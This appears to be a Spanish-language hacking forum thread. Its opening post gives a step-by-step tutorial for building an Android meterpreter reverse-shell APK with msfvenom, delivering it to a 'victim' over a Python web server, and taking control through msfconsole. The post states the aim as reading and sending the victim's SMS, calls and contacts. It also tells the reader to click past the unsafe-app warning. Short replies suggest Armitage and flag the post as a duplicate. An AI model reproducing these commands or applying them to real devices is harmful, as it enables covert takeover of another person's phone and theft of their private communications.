👨‍💻 CONTROLAR MÓVIL ANDROID CON METASPLOIT 👨‍💻


Robeer

Miembro muy activo
image-removebg-preview.png

IMPORTANTE: PARA HACER ESTE ATAQUE ES NECESARIO TENER UN SISTEMA OPERATIVO KALI LINUX

NIVEL DE DIFICULTAD: ⭐⭐⭐ ✰ ✰

Resumen: Vamos a crear desde la terminal de linux un apk infectado q enviaremos a la victima, una vez esa persona ejecute el apk tendremos acceso total a su dispositivo, pudiendo ver sus sms, enviar sms, llamadas, contactos, etc...


Paso nº1: Abrir terminal
Paso nº2: Ejecutar sudo su para entrar en modo root
Paso nº3: Ver ip privado con hostname -I
Paso nº4: Escribir msfvenom -p android/meterpreter/reverse_tcp LHOST=(tu ip privada) LPORT=433 -o virus.apk
Paso nº5: Crear servidor http con python para descargar el apk en el móvil python3 -m http.server 80
Paso nº6: Buscar en el navegador del móvil (tu ip privada):80 ejemplo 192.168.0.63:80 y descargar el apk
Paso nº7: Si al descargar te sale un aviso de que la aplicación no es segura, dale a más detalles e instalar de todas formas
Paso nº8: En la terminal escribe msfconsole
Paso nº9: Dentro del msfconsole escribe use /multi/handler
Paso nº10: Escribe set payload android/meterpreter/reverse_tcp
Paso nº11: Escribe set LHOST (tu ip privada)
Paso nº12: Escribe set LPORT 433
Paso nº13: Escribe run
Paso nº14: Ahora ejecuta el apk y acepta los permisos
Paso nº15: Y listo ya tienes el control de un dispositivo android, si no sabes que comandos utilizar escribe help y se te escribirán todos los comandos en la terminal
 

Wizzard

Miembro muy activo
Bua esto me trae recuerdos... Si los comandos se le hacen bola a alguien siempre pueden tirar de armitage que digamos que es una interfaz mas visual para metasploit.
 
  • Like
Reacciones : BocaDePez y Robeer

DBØY

>su 313
Burgués de Nodo
Noderador
Nodero
Noder
Ya hay un post sobre exactamente lo mismo... Porfavor comprueba con la lupa si ya existe un post antes te publicar algo